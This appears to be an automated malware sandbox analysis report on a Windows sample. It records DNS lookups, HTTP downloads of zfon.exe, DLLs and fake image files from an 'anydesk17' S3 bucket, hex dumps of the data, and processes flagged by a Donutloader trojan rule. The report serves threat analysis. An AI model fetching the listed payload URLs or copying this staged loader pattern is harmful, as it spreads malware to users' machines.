                                                                                                                                                                          Dec 18, 2024 13:06:45.321285009 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.321341038 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.321383953 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.321393013 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.321475029 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.322160959 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:52.798896074 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:52.918484926 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:52.918575048 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.866194963 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.985985041 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.986011982 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.986125946 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.986171007 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:57.614070892 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:57.798762083 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:57.905992031 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025800943 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025862932 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025876999 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025878906 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.145627975 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:14.795324087 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:14.915246964 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:15.323853016 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:15.371191025 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:32.943181038 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:33.062763929 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:33.471837044 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:33.520684958 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:49.896770000 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:50.016439915 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:50.425357103 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:50.473802090 CET497244433192.168.2.827.50.63.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 13:05:58.532718897 CET | 64643 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 13:05:58.737714052 CET | 53 | 64643 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 13:06:05.714289904 CET | 61616 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 13:06:05.930572987 CET | 53 | 61616 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 13:06:19.321496964 CET | 56410 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 13:06:19.459754944 CET | 53 | 56410 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 13:06:23.287617922 CET | 56288 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 13:06:23.497256041 CET | 53 | 56288 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 13:06:34.664942980 CET | 53092 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 13:06:34.881505966 CET | 53 | 53092 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 13:06:56.894188881 CET | 56547 | 53 | 192.168.2.8 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 13:05:58.532718897 CET | 192.168.2.8 | 1.1.1.1 | 0x9291 | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:05.714289904 CET | 192.168.2.8 | 1.1.1.1 | 0xc663 | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:19.321496964 CET | 192.168.2.8 | 1.1.1.1 | 0xfcae | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:23.287617922 CET | 192.168.2.8 | 1.1.1.1 | 0x59fd | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:34.664942980 CET | 192.168.2.8 | 1.1.1.1 | 0xc83b | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:56.894188881 CET | 192.168.2.8 | 1.1.1.1 | 0x249d | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 13:05:58.737714052 CET | 1.1.1.1 | 192.168.2.8 | 0x9291 | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:05:58.737714052 CET | 1.1.1.1 | 192.168.2.8 | 0x9291 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.239.146 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:58.737714052 CET | 1.1.1.1 | 192.168.2.8 | 0x9291 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.161.53 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:05.930572987 CET | 1.1.1.1 | 192.168.2.8 | 0xc663 | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:06:05.930572987 CET | 1.1.1.1 | 192.168.2.8 | 0xc663 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.160.78 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:05.930572987 CET | 1.1.1.1 | 192.168.2.8 | 0xc663 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.161.33 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:19.459754944 CET | 1.1.1.1 | 192.168.2.8 | 0xfcae | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:06:19.459754944 CET | 1.1.1.1 | 192.168.2.8 | 0xfcae | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.239.146 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:19.459754944 CET | 1.1.1.1 | 192.168.2.8 | 0xfcae | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.161.58 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:23.497256041 CET | 1.1.1.1 | 192.168.2.8 | 0x59fd | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:06:23.497256041 CET | 1.1.1.1 | 192.168.2.8 | 0x59fd | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.237.170 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:23.497256041 CET | 1.1.1.1 | 192.168.2.8 | 0x59fd | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.238.29 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:34.881505966 CET | 1.1.1.1 | 192.168.2.8 | 0xc83b | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:06:34.881505966 CET | 1.1.1.1 | 192.168.2.8 | 0xc83b | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.162.66 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:34.881505966 CET | 1.1.1.1 | 192.168.2.8 | 0xc83b | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.162.78 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:57.033751011 CET | 1.1.1.1 | 192.168.2.8 | 0x249d | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                                                                                          • anydesk17.s3.ap-east-1.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49709 | 3.5.239.146 | 443 | 1644 | C:\Users\user\Desktop\nrGkqbCyKP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:00 UTC | 94 | OUT | GET /zfon.exe HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
Connection: Keep-Alive
2024-12-18 12:06:01 UTC | 447 | IN | HTTP/1.1 200 OK
x-amz-id-2: APpzxCZG//eF37uDBK2QKgGWr8Hsb1l50W5nTETEENPeXA8qhO+Nv1DaYLfDBP/Hg+dYIseDCyrvhocCo9MFh4/aqrqAPShS
x-amz-request-id: VKCD6DD02MQJMSH8
Date: Wed, 18 Dec 2024 12:06:02 GMT
Last-Modified: Fri, 13 Dec 2024 18:14:06 GMT
ETag: "44ad77338a945fe1451861b59267a68d"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: binary/octet-stream
Content-Length: 2659840
Server: AmazonS3
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49712 | 52.95.160.78 | 443 | 1644 | C:\Users\user\Desktop\nrGkqbCyKP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:07 UTC | 72 | OUT | GET /libcef.dll HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
2024-12-18 12:06:08 UTC | 426 | IN | HTTP/1.1 200 OK
x-amz-id-2: dx49aNYVGYRP9+acXyxhnIwSqn4oGcww4XXlQI7dfI3gT13nrO7dcRMmqQ96i8Q4NfhvO6Fgvlw=
x-amz-request-id: 08GVENWDRGZWW4K0
Date: Wed, 18 Dec 2024 12:06:09 GMT
Last-Modified: Sat, 07 Dec 2024 17:32:42 GMT
ETag: "d7b50924ab14320b946526eb3db6a08f"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: binary/octet-stream
Content-Length: 271126
Server: AmazonS3
Connection: close
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:09 UTC9000INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:10 UTC16384INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:10 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49718 | 3.5.239.146 | 443 | 1644 | C:\Users\user\Desktop\nrGkqbCyKP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:21 UTC | 74 | OUT | GET /MSVCP140.dll HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
2024-12-18 12:06:22 UTC | 446 | IN | HTTP/1.1 200 OK
x-amz-id-2: XG5nDOE2vU0xV823i87yA6EIRXzgo+RS5Y/9LvI7TAu++f9Rmh9PRFbzKAIk8mLux6QeYuSDu8X1tINqd8ouNGRk3Vj0KFJ6
x-amz-request-id: P1RR2W74N748Q169
Date: Wed, 18 Dec 2024 12:06:22 GMT
Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
ETag: "c1b066f9e3e2f3a6785161a8c7e0346a"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: binary/octet-stream
Content-Length: 627992
Server: AmazonS3
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49719 | 3.5.237.170 | 443 | 1644 | C:\Users\user\Desktop\nrGkqbCyKP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:25 UTC | 78 | OUT | GET /VCRUNTIME140.dll HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
2024-12-18 12:06:26 UTC | 438 | IN | HTTP/1.1 200 OK
x-amz-id-2: p94mufkVfvm70mcHLn1T+lqTWkYUs5m4aSm2immRZS/HpEE0jv7hnblVo4N+5JEl6k1MbQNh3yMtHeCn6LWevg==
x-amz-request-id: V3QZP8AW1MF4G0F8
Date: Wed, 18 Dec 2024 12:06:26 GMT
Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
ETag: "e9b690fbe5c4b96871214379659dd928"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: binary/octet-stream
Content-Length: 119376
Server: AmazonS3
Connection: close
                                                                                                                                                                          Data Ascii: &LuHMDu#HMLHMHHjHmDwHHZ7tStAt-t(tHHPuHafHYH?LPGtPtKtFtAtH
                                                                                                                                                                          2024-12-18 12:06:26 UTC1024INData Raw: c4 20 5d c3 cc 40 55 48 83 ec 20 48 8b ea e8 16 51 ff ff 83 78 30 00 7e 08 e8 0b 51 ff ff ff 48 30 48 83 c4 20 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 fb 0c ff ff 90 48 83 c4 30 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 dd 50 ff ff 83 78 30 00 7e 08 e8 d2 50 ff ff ff 48 30 48 83 c4 30 5d c3 cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 38 e8 6a e6 ff ff 90 48 83 c4 20 5d c3 cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 01 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 48 83 c4 20 5d c3 cc 40 55 48 83 ec 30 48 8b ea 48 8b 01 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 48 83 c4 30 5d c3 cc 48 8d 8a 70 00 00 00 e9 20 5b ff ff 40 55 48 83 ec 20 48 8b ea 33 c9 48 83 c4 20 5d e9 bb 4f ff ff cc 40 53 55 57 48 83 ec 40 48 8b ea 48 89 4d 50 48 89 4d 48 e8 2e 50 ff ff 48 8b 8d 80
                                                                                                                                                                          Data Ascii: ]@UH HQx0~QH0H ]@UH0HH0]@UH0HPx0~PH0H0]@UH HHM8jH ]@UH HH38H ]@UH0HH38H0]Hp [@UH H3H ]O@SUWH@HHMPHMH.PH
                                                                                                                                                                          2024-12-18 12:06:26 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49720 | 3.5.237.170 | 443 | 1644 | C:\Users\user\Desktop\nrGkqbCyKP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:28 UTC | 69 | OUT | GET /aut.png HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
2024-12-18 12:06:29 UTC | 438 | IN | HTTP/1.1 200 OK
x-amz-id-2: rI47jLMN1CC8G9tS3eze5uDGhiROnTNOcUzGTO1OPQu9kLNGBkczQZwHKpJA+X6uRnNl1SIuupAq1bmaeJTr2g==
x-amz-request-id: QNYBCJF3CKBRBBJK
Date: Wed, 18 Dec 2024 12:06:30 GMT
Last-Modified: Fri, 13 Dec 2024 18:14:05 GMT
ETag: "0ca6a22e9feadb18c76712b5b0256b96"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: binary/octet-stream
Content-Length: 660160
Server: AmazonS3
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49721 | 52.95.162.66 | 443 | 1644 | C:\Users\user\Desktop\nrGkqbCyKP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:36 UTC | 80 | OUT | GET /vcruntime140_1.dll HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
2024-12-18 12:06:37 UTC | 425 | IN | HTTP/1.1 200 OK
x-amz-id-2: IKklgBIGQ85iPJ17KXeF6ibdx1cfm8juPjow40KF0dnG4ElKmrYDEf7DqTd4qncRatkUqqpXQSw=
x-amz-request-id: VFS7T7102D6XM1A8
Date: Wed, 18 Dec 2024 12:06:38 GMT
Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
ETag: "eb49c1d33b41eb49dfed58aafa9b9a8f"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: binary/octet-stream
Content-Length: 49744
Server: AmazonS3
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49722 | 52.95.162.66 | 443 | 1644 | C:\Users\user\Desktop\nrGkqbCyKP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:40 UTC | 70 | OUT | GET /view.png HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
2024-12-18 12:06:41 UTC | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: MGA/C1Odh8gQl1h860LU6bWytOPPSBgtygFqOpyCQzGpEHWomCsxomno/UKw3SJuMrecrYH6j0M=
                                                                                                                                                                          x-amz-request-id: 8PSCTYY89BS53JBC
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:41 GMT
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 20:28:18 GMT
                                                                                                                                                                          ETag: "1e17e3f8b9917ce02cdb53f289db96c9"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                          Content-Length: 376421
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:07:05:52
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\nrGkqbCyKP.exe"
                                                                                                                                                                          Imagebase:0x6e0000
                                                                                                                                                                          File size:43'976 bytes
                                                                                                                                                                          MD5 hash:84101C768BFD9493C2926066E7AAA6F2
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:07:06:44
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe"
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:7
                                                                                                                                                                          Start time:07:06:44
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2059338632.0000026ADFDF7000.00000008.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000003.2010588639.0000026ADE1D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:07:06:45
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\hh.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\windows\hh.exe
                                                                                                                                                                          Imagebase:0x7ff6cdce0000
                                                                                                                                                                          File size:18'432 bytes
                                                                                                                                                                          MD5 hash:2C8FE78D53C8CA27523A71DFD2938241
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:11
                                                                                                                                                                          Start time:07:06:45
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7064 -s 396
                                                                                                                                                                          Imagebase:0x7ff62e100000
                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:12
                                                                                                                                                                          Start time:07:06:47
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                          Imagebase:0x7ff62d7d0000
                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000000.2018147867.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:14
                                                                                                                                                                          Start time:07:06:50
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7064 -s 92
                                                                                                                                                                          Imagebase:0x7ff62e100000
